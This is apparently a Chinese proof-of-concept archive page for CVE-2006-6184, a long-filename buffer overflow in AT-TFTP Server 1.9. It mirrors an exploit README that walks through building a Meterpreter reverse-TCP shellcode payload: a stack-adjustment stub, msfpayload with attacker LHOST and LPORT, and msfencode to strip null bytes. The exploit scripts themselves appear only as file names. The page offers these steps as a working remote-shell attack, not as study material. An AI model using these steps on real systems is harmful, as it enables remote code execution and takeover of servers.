关联漏洞
标题:
AT-TFTP Server超长文件名远程缓冲区溢出漏洞
(CVE-2006-6184)
描述:AT-TFTP Server是一款免费的基于Windows的TFTP服务器,用于在PC和Allied Telesis路由器及一些交换机之间传输软件发布、补丁、脚本等。 AT-TFTP Server在处理带有超长文件名参数的请求时存在漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。 AT-TFTP Server在处理传送给GET或PUT命令的超长文件名(大于227个字节)时存在缓冲区溢出。如果攻击者向服务器发送了恶意报文的话就会触发这个漏洞,导致拒绝服务或执行任意代码。
描述
simplified version of https://github.com/shauntdergrigorian/cve-2006-6184
介绍
# CVE-2006-6184
This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflow in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allowing remote attackers to cause a denial of service or execute arbitrary code.
### Quick Start
0. let exploit/multi/handler listening
1. python generate.py LHOST LPORT PAYLOAD RHOST RPORT (PAYLOAD example: windows/meterpreter/reverse_nonx_tcp)
2. happy coding (maybe migrate process first(?))
#### SKIDDIES BEWARE!
You didn't think it'd be that easy did you?
The payload must be customized to include your own IP address and listening port, so you'll need to generate it yourself.
To do so, use the following steps:
1.) Enter the following to create a hex file of the amount that needs to be subtracted from the stack pointer (3500):
```sh
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
```
2.) Next, use the following command to create a staged meterpreter shell payload:
```sh
msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
```
3.) Then, combine the two files you just created.
```sh
cat stackadj payload > shellcode
```
4.) Finally, let's eliminate the bad characters.
```sh
cat shellcode | msfencode -b '\x00' -e x86/shikata_ga_nai -t python
```
Enter the output as the value of the "payload" variable.
文件快照
[4.0K] /data/pocs/08d10ac5aa0651b719f6f6e1da889a6387f5888f
├── [2.5K] atftp.py
├── [1.1K] generate.py
└── [1.3K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。